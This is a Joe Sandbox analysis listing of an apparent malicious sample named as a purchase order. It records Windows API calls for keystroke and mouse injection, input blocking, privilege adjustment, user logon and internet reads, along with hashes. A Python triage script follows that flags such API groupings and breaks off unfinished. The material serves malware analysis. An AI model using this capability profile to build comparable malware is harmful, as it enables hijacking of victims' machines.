                      • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00AF2116
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: GetProcessId$kernel32.dll
                      • API String ID: 2574300362-399901964
                      • Opcode ID: 02ed7ea642128873aeba5e1b500ddf41cad84533e170bcbb78589a1c87255765
                      • Instruction ID: d5aba54f2a2ffcf78b1d86b880ffd7c03e027ce06d8d16e83497ff280c422e08
                      • Opcode Fuzzy Hash: 02ed7ea642128873aeba5e1b500ddf41cad84533e170bcbb78589a1c87255765
                      • Instruction Fuzzy Hash: 6DD0A7744403129FD7205FA5E80D75237E8EF04300B008469F749E2168DB70C480CB14
                      APIs
                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00AD439C
                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00AD43B8
                      • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00AD4425
                      • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00AD4483
                      Similarity
                      • API ID: KeyboardState$InputMessagePostSend
                      • String ID:
                      • API String ID: 432972143-0
                      • Opcode ID: d827d414704bdaa39203aaf9f01f5ae54fc2272176b2e10bfd4092e0ccb84c2e
                      • Instruction ID: 65e9ffd7576f24b81cd6e6889531d451f489142b40338e1468a2a96299a8a922
                      • Opcode Fuzzy Hash: d827d414704bdaa39203aaf9f01f5ae54fc2272176b2e10bfd4092e0ccb84c2e
                      • Instruction Fuzzy Hash: 3641F2F1A00248ABEF208B659848BFDBBB5AB5D311F04415BF487973C1CB7489C59B62
                      APIs
                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00AD221E
                      Similarity
                      • API ID: lstrlen
                      • String ID: ($|
                      • API String ID: 1659193697-1631851259
                      • Opcode ID: f36fdfea4fb0294cde6ff60b93ece1779248360c00feee6069e636a8fdad69da
                      • Instruction ID: 98ed8696a321bf73edfc82146d81fff7423f8ec32e99a046d98b940b151bf045
                      • Opcode Fuzzy Hash: f36fdfea4fb0294cde6ff60b93ece1779248360c00feee6069e636a8fdad69da
                      • Instruction Fuzzy Hash: 3A321475A007059FCB28CF69C480AAAB7F0FF58320B15C56EE49ADB7A1E770E941CB44
                      APIs
                        • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00AAAE5E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: LongProcWindow
                      • String ID:
                      • API String ID: 3265722593-0
                      • Opcode ID: aed90df63eee2fada9648deb9731ded3987f3dcb31a63c70da72939f9abd4a1c
                      • Instruction ID: 1d22a91ee37e1bd3a85429698f554e045bc37f91b65c9fa61ea93b91db895170
                      • Opcode Fuzzy Hash: aed90df63eee2fada9648deb9731ded3987f3dcb31a63c70da72939f9abd4a1c
                      • Instruction Fuzzy Hash: DFA10570204216BEDB38AB298D88EBF39EDEB67751B10456EF502D75E2DB258C01D273
                      APIs
                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00AE4A1E,00000000), ref: 00AE55FD
                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00AE5629
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Internet$AvailableDataFileQueryRead
                      • String ID:
                      • API String ID: 599397726-0
                      • Opcode ID: a0affccd7b63b3663737cb6aeafd1f083a2ec2a43f8817d6a7b134dfe7596bba
                      • Instruction ID: 49ec9dc6559877161e91bf8ffdb34fdabe4d68020e3f8c3b86cfcea34a4fa620
                      • Opcode Fuzzy Hash: a0affccd7b63b3663737cb6aeafd1f083a2ec2a43f8817d6a7b134dfe7596bba
                      • Instruction Fuzzy Hash: 1E410571D00A49BFEB109FA6ED85EBFB7BDEB4071CF14401AF605A7181DA709E419B60
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 00ADEA95
                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00ADEAEF
                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00ADEB3C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ErrorMode$DiskFreeSpace
                      • String ID:
                      • API String ID: 1682464887-0
                      • Opcode ID: f03a675e613f4ae3cee42306b64b2482dc8baaf9e752e3ed43528383147882a4
                      • Instruction ID: e06e1482fd39e7a770768be8b23c94095bf74fc49c2682a3f83f6602a785c2b9
                      • Opcode Fuzzy Hash: f03a675e613f4ae3cee42306b64b2482dc8baaf9e752e3ed43528383147882a4
                      • Instruction Fuzzy Hash: 6C215E35A00218EFCB00EFA5D995AEDBBF8FF49310F14849AE806AB351DB35E915CB50
                      APIs
                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AD70D8
                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00AD7115
                      • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AD711E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CloseControlCreateDeviceFileHandle
                      • String ID:
                      • API String ID: 33631002-0
                      • Opcode ID: c1026324e098b80a35341a27c9f5362b29340223800cba4e5415f69f6029ff01
                      • Instruction ID: d32c8b878484698c88a2aa550bb5c6ecc949ec0e00d376496c9611fc2df775ea
                      • Opcode Fuzzy Hash: c1026324e098b80a35341a27c9f5362b29340223800cba4e5415f69f6029ff01
                      • Instruction Fuzzy Hash: 4E11A5B1900229BEE7108BA8DC45FEFB7BCEB08714F404656B901F72A0D6B49E0487E1
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID:
                      • API String ID: 4104443479-0
                      • Opcode ID: 72a24b7a2e7163179f9035deca2ebbe289b34cd2219913959bdd873ba2b9dfca
                      • Instruction ID: 2e92734ad194dd170fea6e21118d441def59ebe4d44288ea974b3248588099d3
                      • Opcode Fuzzy Hash: 72a24b7a2e7163179f9035deca2ebbe289b34cd2219913959bdd873ba2b9dfca
                      • Instruction Fuzzy Hash: BEA22575E00219DBCF24CF58C8806ADBBF1FF48314F6581AAE859AB390D7749E91DB90
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 51f81d92b6d8425068015a34ee78aa520c339f5e986a3c8386338bf4c2a9e4da
                      • Instruction ID: c64d428ce48ed47206e06e8a6c8d5ea6dce93f9f0dcffc3c2790c23851f5082b
                      • Opcode Fuzzy Hash: 51f81d92b6d8425068015a34ee78aa520c339f5e986a3c8386338bf4c2a9e4da
                      • Instruction Fuzzy Hash: 6622AE74A00216DFDF24DF58C491BAABBF0FF19300F148169E8969B392E771AD85CB91
                      APIs
                      • FindFirstFileW.KERNEL32(?,?), ref: 00ADFD71
                      • FindClose.KERNEL32(00000000), ref: 00ADFDA1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Find$CloseFileFirst
                      • String ID:
                      • API String ID: 2295610775-0
                      • Opcode ID: 08b3987930de1124262dfa137d038cf927e1f583c36cf9d1c155e6ee527ea58e
                      • Instruction ID: 81f8ad2e51655737f6df2bfac7ba274f620693061aa46ac3a7144cb8e0a061cd
                      • Opcode Fuzzy Hash: 08b3987930de1124262dfa137d038cf927e1f583c36cf9d1c155e6ee527ea58e
                      • Instruction Fuzzy Hash: C711D6316102019FD700DF28C945A2AF7E9FF85324F00851EF8A6DB391DB34ED158B81
                      APIs
                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00AEC2E2,?,?,00000000,?), ref: 00ADD73F
                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00AEC2E2,?,?,00000000,?), ref: 00ADD751
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ErrorFormatLastMessage
                      • String ID:
                      • API String ID: 3479602957-0
                      • Opcode ID: ac1b6b6118ccdb79e1ffd2b78b38df7c8f349e76a9e4a044ec497c6044e17f8a
                      • Instruction ID: 421dc574983f373adf1382684e7c4ea3b39f150898885f0123d1fab586a94fe1
                      • Opcode Fuzzy Hash: ac1b6b6118ccdb79e1ffd2b78b38df7c8f349e76a9e4a044ec497c6044e17f8a
                      • Instruction Fuzzy Hash: 2DF08C3510032DABDB21AFA4CC49FEA7BADAF493A1F008156B91AD7181D6709A40CBA0
                      APIs
                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00AD4B89
                      • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00AD4B9C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: InputSendkeybd_event
                      • String ID:
                      • API String ID: 3536248340-0
                      • Opcode ID: a51c5ff87ce81378cfecdcbf6027837b56daf375d4de3f345a841830da2e8eb2
                      • Instruction ID: b9fd87150471da4d2176f171b5f3234ba8fe108d90788de59e42fe77b696c89d
                      • Opcode Fuzzy Hash: a51c5ff87ce81378cfecdcbf6027837b56daf375d4de3f345a841830da2e8eb2
                      • Instruction Fuzzy Hash: 42F01D7090434DAFDB058FA5C805BBE7BB4AF14305F04C40AF955A6291D779C6159F94
                      APIs
                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00ACB9EC), ref: 00ACB8C5
                      • CloseHandle.KERNEL32(?,?,00ACB9EC), ref: 00ACB8D7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AdjustCloseHandlePrivilegesToken
                      • String ID:
                      • API String ID: 81990902-0
                      • Opcode ID: ab206e182ad67e886b96238e6db950cb4acd16b6f347b29670ff33ea66a19cb9
                      • Instruction ID: c703ca4f6398407495c633f34de5e2856e449762f65545a13ed16b5fdef61f3a
                      • Opcode Fuzzy Hash: ab206e182ad67e886b96238e6db950cb4acd16b6f347b29670ff33ea66a19cb9
                      • Instruction Fuzzy Hash: A1E0B672014611AEE7262B64FD09DB77BEDEF08311B11C929F49682471DB62AC90DB10
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,00A9125D,00AB7A43,00A90F35,?,?,00000001), ref: 00AB8E41
                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00AB8E4A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: 7ee4ee3016e1c8ce53920bf499f65ed640a3f359f174af64936cf181d916d132
                      • Instruction ID: 0a2f519658063e377239753cdaf68f5dd3ba06571924ff205d1add3dcd942e01
                      • Opcode Fuzzy Hash: 7ee4ee3016e1c8ce53920bf499f65ed640a3f359f174af64936cf181d916d132
                      • Instruction Fuzzy Hash: FFB09271044A08ABEA002BA1FC09BC83F78EB08A62F808010F62D46060CF6354508A9A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: BuffCharUpper
                      • String ID:
                      • API String ID: 3964851224-0
                      • Opcode ID: 2b28f0812ca77073735592d67f932c752ae7aa4a3c4dfdf9cfb249575d648bae
                      • Instruction ID: 46bbf7de41bbf9e45cb3ce4ee2732e3c9760783d3b37c43abf4a04d7cb31f994
                      • Opcode Fuzzy Hash: 2b28f0812ca77073735592d67f932c752ae7aa4a3c4dfdf9cfb249575d648bae
                      • Instruction Fuzzy Hash: 6A9266716083419FDB24DF18C580B6ABBF0BF89304F14899DF98A8B2A2D775ED45CB52
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 96e724d42ecc4ef5b946502ac56e706b206c3754894f134d4587f8184bcdb65d
                      • Instruction ID: 6ae55884aa5d8c46373ceb529d11c3d855a50f23ae4f833510b44d739e7841f5
                      • Opcode Fuzzy Hash: 96e724d42ecc4ef5b946502ac56e706b206c3754894f134d4587f8184bcdb65d
                      • Instruction Fuzzy Hash: 3EB1CF20E2AF404DD63396398831337B65CAFBB2D5F92D71BFC6A75D62EB2185834180
                      APIs
                      • BlockInput.USER32(00000001), ref: 00AE7057
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: BlockInput
                      • String ID:
                      • API String ID: 3456056419-0
                      • Opcode ID: e4f7cd30a652f021ca9192e4b505fa1322d37307959a8753ec135ae7bf42c922
                      • Instruction ID: ff4cf8c11ccac603847894b82a3b54a94a9ea2db0a36a875b1645adfe62716aa
                      • Opcode Fuzzy Hash: e4f7cd30a652f021ca9192e4b505fa1322d37307959a8753ec135ae7bf42c922
                      • Instruction Fuzzy Hash: 04E048353042045FD710EFA9D504E9AF7ECAF54750F00C426F945D7251DAB0E8009BA0
                      APIs
                      • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00AD7DF8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: mouse_event
                      • String ID:
                      • API String ID: 2434400541-0
                      • Opcode ID: 90ea0c71edb6de1ab0a17d8acf7e563cc594c25f26d2bcbf6b3dac3ad3811a4d
                      • Instruction ID: f064db862ad288dfc3299ae0e23f29ecb2dacf523dc222f72935a685071d7aa1
                      • Opcode Fuzzy Hash: 90ea0c71edb6de1ab0a17d8acf7e563cc594c25f26d2bcbf6b3dac3ad3811a4d
                      • Instruction Fuzzy Hash: FAD017A816C20669E91C07209C2FF7E211AEB00780FE0824BB4C3862C1FC9068005824
                      APIs
                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00ACBA6A), ref: 00ACBEB3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: LogonUser
                      • String ID:
                      • API String ID: 1244722697-0
                      • Opcode ID: d67177034616d48d4a6669edf9053b6187066b9d69e06a2fa2acae3d9c64359c
                      • Instruction ID: 85f58b21915ded54f1f52474c069008f431a8bca7844fa380cb09e04ce30c03f
                      • Opcode Fuzzy Hash: d67177034616d48d4a6669edf9053b6187066b9d69e06a2fa2acae3d9c64359c
                      • Instruction Fuzzy Hash: 8CD09E321A465EAEDF029FA4DC06EAE3F6AEB04701F448511FA15D60A1C675D531AB50
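                      The function entries above that matter most for triage are the DeviceIoControl call with control code 002D1400 (ref 00AD7115), the SendInput/keybd_event, mouse_event and BlockInput(1) calls, AdjustTokenPrivileges and LogonUserW. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses the "• Name.MODULE(args), ref: ADDR" lines in the format shown on this page, groups them per function, splits the DeviceIoControl control code into its CTL_CODE fields (device type, access, function, method, as defined in the Windows SDK; 0x002D1400 is IOCTL_STORAGE_QUERY_PROPERTY, device type FILE_DEVICE_MASS_STORAGE, function 0x500, METHOD_BUFFERED) and flags API groupings worth a first look. The sample listing embedded in the script is a constructed excerpt copied from the entries above, and the flag names are this example's own heuristics, not Joe Sandbox signatures.

```python
"""Triage of the per-function 'APIs' entries in a Joe Sandbox listing.

Added example; not code from the Joe Sandbox report or from the sample.
CTL_CODE field layout, FILE_DEVICE_* values and
IOCTL_STORAGE_QUERY_PROPERTY = 0x002D1400 are Windows SDK facts; the
flag vocabulary below is this example's own heuristic.
"""
import re

# Constructed excerpt: API lines copied from the listing above.
SAMPLE_LISTING = """\
APIs
• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AD70D8
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00AD7115
• CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AD711E
APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00AD4B89
• keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00AD4B9C
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00ACB9EC), ref: 00ACB8C5
• CloseHandle.KERNEL32(?,?,00ACB9EC), ref: 00ACB8D7
APIs
• BlockInput.USER32(00000001), ref: 00AE7057
APIs
• mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00AD7DF8
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00ACBA6A), ref: 00ACBEB3
"""

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# CTL_CODE(DeviceType, Function, Method, Access) packs the fields as
# DeviceType << 16 | Access << 14 | Function << 2 | Method.
FILE_DEVICE = {0x02: "FILE_DEVICE_CD_ROM", 0x07: "FILE_DEVICE_DISK",
               0x2D: "FILE_DEVICE_MASS_STORAGE"}
METHOD = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]
ACCESS = ["FILE_ANY_ACCESS", "FILE_READ_ACCESS", "FILE_WRITE_ACCESS",
          "FILE_READ_ACCESS|FILE_WRITE_ACCESS"]
KNOWN_IOCTLS = {0x002D1400: "IOCTL_STORAGE_QUERY_PROPERTY"}


def decode_ioctl(code):
    """Split a DeviceIoControl control code into its CTL_CODE fields."""
    device = (code >> 16) & 0xFFFF
    return {
        "code": code,
        "name": KNOWN_IOCTLS.get(code, "unknown"),
        "device_type": device,
        "device_name": FILE_DEVICE.get(device, "unknown"),
        "access": ACCESS[(code >> 14) & 0x3],
        "function": (code >> 2) & 0xFFF,
        "method": METHOD[code & 0x3],
    }


def hex_arg(arg):
    """Integer value of a report argument, or None when the report shows '?'."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]+", arg) else None


def parse_listing(text):
    """Group the call lines under each 'APIs' heading into one list per function."""
    groups, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            groups.append(current)
            continue
        m = API_LINE.match(line)
        if m and current is not None:
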